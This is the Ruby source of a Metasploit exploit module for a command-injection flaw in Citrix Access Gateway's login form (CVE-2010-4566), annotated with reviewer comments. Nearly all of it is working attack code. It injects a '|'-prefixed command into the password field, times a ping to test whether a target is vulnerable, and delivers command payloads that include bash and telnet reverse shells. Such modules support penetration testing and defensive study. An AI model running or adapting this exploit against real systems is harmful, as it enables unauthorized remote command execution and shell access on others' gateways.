
Citrix Access Gateway - Command Execution (Metasploit)

Platform:

Linux

Date:

2011-03-03

##
# $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    # Module metadata. The weakness is an OS command injection reached
    # through the Access Gateway's web login form (CVE-2010-4566, see
    # 'References'). The payload is a plain command string ('Arch' =>
    # ARCH_CMD) capped at 127 bytes ('Space'); it is handed to #post
    # unchanged, so everything the remote side sees is visible in this file.
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Citrix Access Gateway Command Execution',
            'Description'    => %q{
                    The Citrix Access Gateway provides support for multiple authentication types.
                When utilizing the external legacy NTLM authentication module known as
                ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
                line utility to verify a user's identity and password.  By embedding shell
                metacharacters in the web authentication form it is possible to execute
                arbitrary commands on the Access Gateway.
            },
            'Author'         =>
                [
                    'George D. Gal', # Original advisory
                    'Erwin Paternotte', # Exploit module
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 11873 $',
            'References'     =>
                [
                    [ 'CVE', '2010-4566' ],
                    [ 'OSVDB', '70099' ],
                    [ 'BID', '45402' ],
                    [ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    # Command payload only: no NOP padding, bash/telnet-style
                    # command stagers declared as compatible.
                    'Space'       => 127,
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd cmd_bash',
                            'RequiredCmd' => 'generic telnet bash-tcp'
                        }
                },
            'DefaultOptions' =>
                {
                    # NOTE(review): presumably the "wait for session" delay,
                    # giving the backgrounded command time to complete — confirm
                    # against the framework's option docs.
                    'WfsDelay' => 30
                },
            'Platform'       => [ 'unix' ],
            'Arch'           => ARCH_CMD,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Dec 21 2010',
            'DefaultTarget'  => 0))

        # Defaults to HTTPS on 443; both RPORT and SSL can be overridden.
        register_options(
            [
                Opt::RPORT(443),
                OptBool.new('SSL', [ true, 'Use SSL', true ]),
            ], self.class)

    end

    # Sends a single login POST to '/' carrying +command+ in the password
    # parameter, prefixed with a '|' shell metacharacter (the vector described
    # in 'Description').
    #
    # @param command [String] the command text placed in the password field
    # @param background [Boolean] when true a trailing '&' is appended so the
    #   remote side does not block on the command (used by #exploit)
    # @return whatever send_request_cgi returns (the response, or nil when no
    #   response arrives within the timeout); the assignment to +res+ is the
    #   method's last expression, so its value is what callers receive
    #
    # Detection note: the request is a POST to '/' with a fixed SESSION_TOKEN
    # literal, a 20-character random alphanumeric username, and a password
    # value beginning with a URL-encoded '|' — that combination is the
    # observable artefact in gateway access logs.
    def post(command, background)
        username = rand_text_alphanumeric(20)

        if background
            sploit = Rex::Text.uri_encode('|' + command + '&')
        else
            sploit = Rex::Text.uri_encode('|' + command)
        end

        # Form body built with << (in-place append) rather than +=.
        data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
        data << username
        data << "&password="
        data << sploit

        # 25-second response timeout; this also bounds the delay #check can
        # measure. No response body is inspected anywhere in the module.
        res = send_request_cgi({
            'uri'     => '/',
            'method'  => 'POST',
            'data'    => data
        }, 25)
    end

    # Time-based (blind) vulnerability check: sends a 'ping -c 10 127.0.0.1'
    # through #post and treats a response delayed by three seconds or more as
    # evidence that the command ran. No output is read, so any delay of 3s or
    # more — whatever its cause — is reported as Vulnerable.
    #
    # @return [Exploit::CheckCode] Vulnerable when elapsed >= 3, else Safe
    def check
        print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")

        # Try running/timing 'ping localhost' to determine if the system is vulnerable.
        # NOTE(review): Time.now is wall-clock; Process.clock_gettime with
        # Process::CLOCK_MONOTONIC is the usual choice for measuring an interval.
        start = Time.now
        post("ping -c 10 127.0.0.1", false)
        elapsed = Time.now - start
        if elapsed >= 3
            return Exploit::CheckCode::Vulnerable
        end

        return Exploit::CheckCode::Safe
    end

    # Delivers the encoded payload command via #post in background mode.
    #
    # @raise [RuntimeError] when #post returns nil/false, i.e. no HTTP response
    #   came back; the message does not distinguish a timeout from a refusal
    def exploit
        cmd = payload.encoded

        # A missing response is the only failure signal available: the
        # gateway's reply is never parsed, so a 200 with an error page would
        # still be treated as success here.
        if not post(cmd, true)
            raise RuntimeError, "Unable to execute the desired command"
        end
    end
end